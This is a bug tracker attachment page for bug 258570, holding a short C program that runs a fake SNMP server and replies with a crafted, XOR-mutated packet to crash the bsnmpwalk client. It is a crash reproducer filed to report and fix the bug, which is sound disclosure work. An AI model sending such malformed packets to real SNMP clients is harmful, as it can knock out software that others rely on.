Attachment 227978 Details for Bug 258570 – Fake snmp server to demonstrate bsnmpwalk crash.

Fake snmp server to demonstrate bsnmpwalk crash.

bsnmpwalk1.c (text/plain), 1.50 KB, created by Robert Morris on 2021-09-18 10:58:00 UTC

(hide)

Description:

Filename:

MIME Type:

Creator: Robert Morris

Created: 2021-09-18 10:58:00 UTC

Size: 1.50 KB

patch

obsolete

>#include <stdio.h>
>#include <stdlib.h>
>#include <unistd.h>
>#include <string.h>
>#include <sys/socket.h>
>#include <netinet/in.h>
>#include <sys/resource.h>
>#include <arpa/inet.h>
>#include <sys/un.h>
>
>char buf[128] = {
>  0x30, 0x26, 0x02, 0x01, 0x01, 0x04, 0x06, 0x70, 0x75, 0x62, 0x6c,
>  0x69, 0x63, 0xa0, 0x19, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x02,
>  0x01, 0x00, 0x30, 0x0e, 0x30, 0x0c, 0x06, 0x08, 0x2b, 0x06, 0x01,
>  0x02, 0x01, 0x01, 0x01, 0x00, 0x05, 0x00
>  };
>
>unsigned long long aa[] = {
>0x1a00ull,
>0x12000000000000ull,
>0x200000000ull,
>0xe00ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>0x0ull,
>};
>
>int main() {
>  struct rlimit r;
>  r.rlim_cur = r.rlim_max = 0;
>  setrlimit(RLIMIT_CORE, &r);
>
>  int s = socket(AF_INET, SOCK_DGRAM, 0);
>  struct sockaddr_in sin;
>  memset(&sin, 0, sizeof(sin));
>  sin.sin_family = AF_INET;
>  sin.sin_port = htons(1610);
>  if(bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror("bind");exit(1);}
>
>  printf("waiting on port 1610 for a request\n");
>  printf("try: bsnmpwalk -s localhost:1610\n");
>  char ibuf[2048];
>  socklen_t sinlen = sizeof(sin);
>  int cc = recvfrom(s, ibuf, sizeof(ibuf), 0, (struct sockaddr *)&sin, &sinlen);
>  printf("got %d from %d\n", cc, ntohs(sin.sin_port));
>
>  int ii = 0;
>  for(int i = 0; i+8 <= sizeof(buf); i += 8)
>    *(unsigned long long *)(buf+i) ^= aa[ii++];
>  int ret = sendto(s, buf, sizeof(buf), 0, (struct sockaddr *)&sin, sizeof(sin));
>  if(ret < 0){perror("sendto");exit(1);}
>  printf("sent reply\n");
>}
>

Actions: View

Attachments on bug 258570: 227978 | 236591